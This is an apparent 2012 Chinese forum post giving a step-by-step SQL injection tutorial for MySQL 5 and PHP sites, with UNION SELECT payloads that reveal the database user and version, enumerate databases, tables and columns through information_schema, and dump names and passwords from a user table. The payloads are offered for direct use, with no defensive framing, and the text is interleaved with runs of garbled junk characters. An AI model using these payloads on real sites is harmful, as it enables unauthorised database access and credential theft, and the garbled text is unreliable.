; k8 `, B5 q: J, B2 P- q3 L
教程内容:Mysql 5+php 注入
) z B( v+ l$ s+ s. D$ M8 F% ?5 S6 m# _- |+ V
) L6 C& e8 Y' P3 q
( z( A" J1 a1 w- x- p% n3 b0 f0 F5 p6 M% m一.查看MYSQL基本信息(库名,版本,用户)5 Y, t3 v5 Y+ z2 V4 `
* g0 l9 W4 i$ z7 [: g1 B. Land 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*0 o. a% |: S# c, u9 E
6 P/ \8 T2 ]' i8 i/ H Z
二.查数据库
# o$ f: Y B1 p7 H$ @% b
* p) ]* E$ p2 u7 Z7 y3 [4 Rand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/* J4 _# i6 K- l) h
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。5 u+ d: C9 @+ V* t1 g' J# e
" v8 V6 b5 t! S( A三.暴表4 x( p! w, S% M5 h
Z3 f# a$ ?. Iand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
2 m4 X0 U1 s& B6 x7 P# Q9 c
% T* `+ b1 O$ Y2 j. K; I3 llimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。0 ^3 L! P; D7 a: b+ Z
- v' e8 ? [% I7 ?9 k, p% R% w
四.暴字段0 F& y: A1 }! I" l( w0 t
' {0 p* t1 S: x5 d% A
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*" A9 o/ G6 Y& F' F) j# q
! ?' z: C1 f# o' }! }. {" T- dlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。4 R6 n$ L, R) S( ~6 l8 W, k) R
, e& d( G; M1 d/ X( m2 y9 ~4 u, g
五.暴数据
, w$ p# x, c7 @: T
; I! a8 I7 S3 y- N9 C/ F; F1 cand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
' g# p) ]* v' v S4 k/ S- H8 g) b9 i6 T
A' f7 Z7 x6 Y5 _# s! s
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。9 `( R9 @3 R0 G
|
发表于 2012-9-13 16:27:53
收藏
支持
反对